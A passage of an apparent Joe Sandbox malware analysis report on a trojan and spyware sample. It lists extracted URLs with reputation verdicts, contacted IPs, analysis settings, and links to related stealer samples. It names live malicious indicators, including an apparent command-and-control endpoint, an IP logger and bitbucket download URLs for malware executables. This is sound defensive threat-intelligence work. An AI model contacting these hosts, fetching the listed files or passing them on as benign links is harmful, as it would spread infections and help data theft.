                    https://potterryisiw.shop/apiKBitLockerToGo.exe, 00000009.00000003.2760301734.00000000057DB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2760595470.00000000057DB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.00000000034A7000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://potterryisiw.shop/apiDBitLockerToGo.exe, 00000009.00000003.2806849532.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2787269781.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806548814.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://tempuri.org/Entity/Id24ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequesteddlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegodlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id21ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://potterryisiw.shop/apirBitLockerToGo.exe, 00000009.00000003.2737314312.00000000034E8000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://potterryisiw.shop:443/apiBitLockerToGo.exe, 00000009.00000003.2819336501.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806685406.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820199183.000000000346E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.0000000003483000.00000004.00000020.00020000.00000000.sdmptrue
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://potterryisiw.shop/apieBitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://cdn.cookielaw.org/dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030AB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://potterryisiw.shop/apiiBitLockerToGo.exe, 00000009.00000003.2806849532.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2787269781.00000000034E7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806548814.00000000034E7000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9eBitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://iplogger.co/https://iplogger.co/1lLubiplogger.co/1lLubBitLockerToGo.exe, 00000009.00000003.2726125579.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726008085.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgBitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://potterryisiw.shop/apibBitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://tempuri.org/Entity/Id10ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id5ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id15ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/Entity/Id10ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RenewdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id8ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062BitLockerToGo.exe, 00000009.00000003.2749860293.00000000057CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentitydlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E24000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeydlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/DdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/06/addressingexdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://potterryisiw.shop/api2BitLockerToGo.exe, 00000009.00000003.2818351872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820293806.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2819099285.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://potterryisiw.shop/api1BitLockerToGo.exe, 00000009.00000003.2819494915.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820525655.00000000034EE000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://x1.c.lencr.org/0BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://x1.i.lencr.org/0BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id13ResponsedlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id12ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommitteddlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000009.00000003.2749499865.00000000058BE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertydlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id7ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icodlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000339A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726583826.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2726391359.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Entity/Id4ResponseDdlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    216.58.212.132
                    		www.google.comUnited States
                    		15169GOOGLEUSfalse
                    185.215.113.67
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue
                    172.67.167.249
                    		iplogger.coUnited States
                    		13335CLOUDFLARENETUSfalse
                    104.192.141.1
                    		bitbucket.orgUnited States
                    		16509AMAZON-02USfalse
                    239.255.255.250
                    		unknownReserved
                    		unknownunknownfalse
                    142.250.185.164
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    188.114.96.3
                    		potterryisiw.shopEuropean Union
                    		13335CLOUDFLARENETUStrue
                    52.216.42.97
                    		s3-w.us-east-1.amazonaws.comUnited States
                    		16509AMAZON-02USfalse

                    Private

                    IP
                    192.168.2.9
                    192.168.2.12

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1468951
                    Start date and time:2024-07-08 10:08:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:dlcdkJcbbV.exe
                    renamed because original name is a hash value
                    Original Sample Name:9adc621f718c8e283e2b946acf914322.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@22/10@12/10
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 67%
                    • Number of executed functions: 77
                    • Number of non-executed functions: 12
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.185.142, 74.125.133.84, 142.250.185.131, 34.104.35.123, 93.184.221.240, 192.229.221.95, 216.58.206.46
                    • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                    • Execution Graph export aborted for target 7.exe, PID 7936 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    04:09:19API Interceptor78x Sleep call for process: dlcdkJcbbV.exe modified
                    04:09:47API Interceptor9x Sleep call for process: BitLockerToGo.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.192.141.1A662vmc5co.exeGet hashmaliciousUnknownBrowse
                    • bitbucket.org/kennethoswald1/aoz918/downloads/LEraggt.exe
                    lahPWgosNP.exeGet hashmaliciousAmadeyBrowse
                    • bitbucket.org/alex222111/testproj/downloads/s7.exe
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.18657.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/tinypro/rEG6d7/ba869eaf2433f3e0b56e4d0776eb5117fc09b21f/files/street-main
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets
                    SecuriteInfo.com.HEUR.Trojan.Script.Generic.20331.xlsxGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets
                    Paid invoice.ppaGet hashmaliciousAgentTeslaBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/Egjbp5/1b96dd9b300f88e62e18db3170d33bf037793d72/files/euromanmain
                    PO#1487958_10.ppaGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal
                    Purchase Inquiry_pdf.ppaGet hashmaliciousAgentTeslaBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
                    Purchase Inquiry_pdf.ppaGet hashmaliciousUnknownBrowse
                    • bitbucket.org/!api/2.0/snippets/warzonepro/8E74BM/47d1c5bd6af9e6b1718ba4d2e049cba6beb1ac95/files/charles1final
                    185.215.113.67oMHveSc3hh.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    0KuDEDABFO.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    miOnrvnXK0.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    Rh74sODsWE.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    dSQUdo6EjO.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    usVhwck8lN.exeGet hashmaliciousAmadey RaccoonBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    SecuriteInfo.com.W32.AIDetect.malware1.20102.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    MR98F1zzeo.exeGet hashmaliciousAmadey Raccoon VidarBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    8f5718a6042061b23a4e42ee5cd8112946c135dc9d0c2.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.67/4dcYcWsw3/index.php
                    fC4T1vVs24.exeGet hashmaliciousAmadeyBrowse
                    • umbrelladownload.uno/gp6GbqVce/index.php
                    172.67.167.2491Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                      hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                        https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          bitbucket.orghttps://instagrampro.net/Get hashmaliciousUnknownBrowse
                          • 104.192.141.1
                          poMkNYHDU3.exeGet hashmaliciousRemcosBrowse
                          • 104.192.141.1
                          SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exeGet hashmaliciousPoverty StealerBrowse
                          • 104.192.141.1
                          d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                          • 104.192.141.1
                          setup.exeGet hashmaliciousRedLineBrowse
                          • 104.192.141.1
                          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                          • 104.192.141.1
                          1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                          • 104.192.141.1
                          1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                          • 104.192.141.1
                          423845.msiGet hashmaliciousUnknownBrowse
                          • 104.192.141.1
                          423845.msiGet hashmaliciousUnknownBrowse
                          • 104.192.141.1
                          potterryisiw.shopSecuriteInfo.com.Win64.Malware-gen.24311.29797.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                          • 188.114.97.3
                          mkFOY01Gl5.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                          • 188.114.97.3
                          1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                          • 188.114.96.3
                          s3-w.us-east-1.amazonaws.comhttp://best-practice-and-impact.github.io/govcookiecutter/Get hashmaliciousUnknownBrowse
                          • 3.5.8.173
                          http://t0koep2cket.top/Get hashmaliciousUnknownBrowse
                          • 3.5.28.36
                          https://woobox.com/jma4u3Get hashmaliciousUnknownBrowse
                          • 52.216.208.201
                          https://app.freelo.io/public/shared-link-view/?a=7d4bf6664acd2b6680f919451ab74732&b=bfcc7360a8233953847f77d79d4988e2Get hashmaliciousUnknownBrowse
                          • 16.182.38.145
                          https://us-west-2.protection.sophos.com/?d=ccl.org&u=aHR0cHM6Ly93d3cuY2NsLm9yZy9sZWFkZXJzaGlwLXNvbHV0aW9ucy9sZWFkZXJzaGlwLWNvYWNoaW5nL2V4ZWN1dGl2ZS1jb2FjaGluZy8=&i=NjI5NzZmYjdjMjFiNDIxMjEzN2I5MjQ0&t=MEZ3VmI0U1h1SlZJSHQ0MUZXZm5xMUNoZDhEZ0JwdWlUR3IzWnpoUUgyRT0=&h=54867f59a225422a805dc298de38f9c8&s=AVNPUEhUT0NFTkNSWVBUSVaqVc7akbkrLF9qV6KT1t7Wq__wYhcpX8W-U88SzpdSfAGet hashmaliciousUnknownBrowse
                          • 52.216.42.209
                          https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661Get hashmaliciousPhisherBrowse
                          • 3.5.29.70
                          d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                          • 3.5.29.31
                          http://texadasoftware.comGet hashmaliciousUnknownBrowse
                          • 52.217.206.137
                          Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.emlGet hashmaliciousUnknownBrowse
                          • 3.5.20.65
                          https://gdfhfrhjytyjgergeriub.s3.amazonaws.com/chbfheruferfurugyguergtrh.html?b7l4p0tja4clxoqqueb94n68km9zejnk9og9e375tjprevkxufihzx431kre0sztm#gkQXHjIaiEbUzctGHfTNblNcbhSMnE&4HKftVNygHV&126276/175/cwmxtbhvit.home.php?sq=1647-36924&lk=256436-21&page=041Get hashmaliciousPhisherBrowse
                          • 52.217.123.177
                          iplogger.coArch0000000000.msiGet hashmaliciousMetamorfoBrowse
                          • 104.21.76.57
                          1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                          • 172.67.167.249
                          hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                          • 172.67.167.249
                          yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                          • 104.21.82.93
                          3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                          • 172.67.188.178
                          3qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                          • 104.21.76.57
                          setup.exeGet hashmaliciousUnknownBrowse
                          • 104.21.76.57
                          YCImxTWoQs.exeGet hashmaliciousRedLineBrowse
                          • 104.21.76.57
                          w5ks798nGQ.exeGet hashmaliciousRedLineBrowse
                          • 172.67.188.178
